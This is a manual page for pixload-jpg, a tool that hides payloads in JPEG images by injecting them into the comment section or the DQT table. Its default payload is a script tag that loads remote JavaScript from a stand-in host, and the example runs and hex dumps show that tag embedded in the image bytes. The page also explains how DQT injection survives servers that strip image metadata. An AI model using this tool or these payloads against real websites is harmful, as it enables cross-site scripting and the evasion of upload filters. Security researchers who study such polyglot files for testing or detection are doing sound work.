pixload-jpg - hide payload/malicious code in JPEG images
pixload-jpg [OPTION]... FILE
pixload-jpg creates a JPEG Image with payload, or injects payload into existing image.
The payload can be injected into COMMENT section or DQT table.
Mandatory arguments to long options are mandatory for short options too.
- -S, --section COM|DQT
-
Inject payload into COMMENT section or DQT table.
In case if payload is injected into COMMENT section, if the output FILE exists, then payload will be injected into the existing file. Otherwise, the new one will be created.
In case if payload is injected into DQT table, the output FILE will be overwritten. Also, note that DQT injecting has a few limitations:
Payload size must not exceed 64 bytes.
As mentioned above, there is no injection support into existing file: the new FILE will be created.
DQT injection must come in handy in case when the server application processes images and removes comments, application-specific data, etc.
Default is COM.
- -P, --payload STRING
-
Set payload for injection. Default is
<script src=//example.com></script>
. - -v, --version
-
Print version and exit.
- -h, --help
-
Print help and exit.
$ pixload-jpg -S com payload.jpg
..... JPEG Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................
[>] Generating output file
[✔] File saved to: payload.jpg
[>] Injecting payload into COMMENT
[✔] Payload was injected successfully
payload.jpg: JPEG image data, progressive, precision 8, 1x1, components 1
00000000 ff d8 ff fe 00 25 3c 73 63 72 69 70 74 20 73 72 |.....%<script sr|
00000010 63 3d 2f 2f 65 78 61 6d 70 6c 65 2e 63 6f 6d 3e |c=//example.com>|
00000020 3c 2f 73 63 72 69 70 74 3e ff db 00 43 00 01 01 |</script>...C...|
00000030 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 |................|
*
00000060 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c2 |................|
00000070 00 0b 08 00 01 00 01 01 01 11 00 ff c4 00 14 00 |................|
00000080 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000090 03 ff da 00 08 01 01 00 00 00 01 3f ff d9 |...........?..|
0000009e
$ pixload-jpg -S dqt payload.jpg
..... JPEG Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................
[>] Generating output file
[✔] File saved to: payload.jpg
[>] Generating output file
[✔] File saved to: payload.jpg
[>] Injecting payload into DQT table
[✔] Payload was injected succesfully
payload.jpg: JPEG image data, progressive, precision 8, 1x1, components 1
00000000 ff d8 ff db 00 43 00 01 01 01 01 01 01 01 01 01 |.....C..........|
00000010 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 |................|
00000020 01 01 01 01 3c 73 63 72 69 70 74 20 73 72 63 3d |....<script src=|
00000030 2f 2f 65 78 61 6d 70 6c 65 2e 63 6f 6d 3e 3c 2f |//example.com></|
00000040 73 63 72 69 70 74 3e ff c2 00 0b 08 00 01 00 01 |script>.........|
00000050 01 01 11 00 ff c4 00 14 00 01 00 00 00 00 00 00 |................|
00000060 00 00 00 00 00 00 00 00 00 03 ff da 00 08 01 01 |................|
00000070 00 00 00 01 3f ff d9 |....?..|
00000077
pixload-bmp(1), pixload-gif(1), pixload-png(1), pixload-webp(1)